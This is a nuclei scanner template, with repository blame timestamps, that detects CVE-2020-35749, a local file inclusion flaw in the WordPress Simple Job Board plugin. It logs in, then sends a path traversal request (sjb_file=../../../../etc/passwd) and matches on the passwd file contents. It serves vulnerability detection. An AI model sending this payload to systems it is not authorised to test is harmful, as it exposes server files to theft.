nuclei-templates/http/cves/2020/CVE-2020-35749.yaml

55 lines
2.0 KiB
YAML
Raw Normal View History

2022-02-08 01:07:19 +00:00
id: CVE-2020-35749
info:
name: WordPress Simple Job Board <2.9.4 - Local File Inclusion
2022-02-08 01:07:19 +00:00
author: cckuailong
severity: high
description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion.
2023-09-06 12:22:36 +00:00
remediation: |
Update to WordPress Simple Job Board version 2.9.4 or later to fix the vulnerability.
2022-02-08 01:07:19 +00:00
reference:
- https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
- https://nvd.nist.gov/vuln/detail/CVE-2020-35749
- https://docs.google.com/document/d/1TbePkrRGsczepBaJptIdVRvfRrjiC5hjGg_Vxdesw6E/edit?usp=sharing
- http://packetstormsecurity.com/files/161050/Simple-JobBoard-Authenticated-File-Read.html
2022-02-08 01:07:19 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.7
cve-id: CVE-2020-35749
cwe-id: CWE-22
epss-score: 0.01796
2023-08-31 11:46:18 +00:00
epss-percentile: 0.86587
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: presstigers
product: simple_board_job
2023-09-06 12:22:36 +00:00
framework: wordpress
2023-07-11 19:49:27 +00:00
tags: authenticated,packetstorm,wp,cve2020,lfi,wordpress,wp-plugin,wpscan,cve
2022-02-08 01:07:19 +00:00
http:
2022-02-08 01:07:19 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
2022-07-02 11:33:57 +00:00
2022-02-08 01:07:19 +00:00
cookie-reuse: true
2023-07-11 19:49:27 +00:00
2022-02-08 01:07:19 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
2022-02-08 18:43:40 +00:00
- 200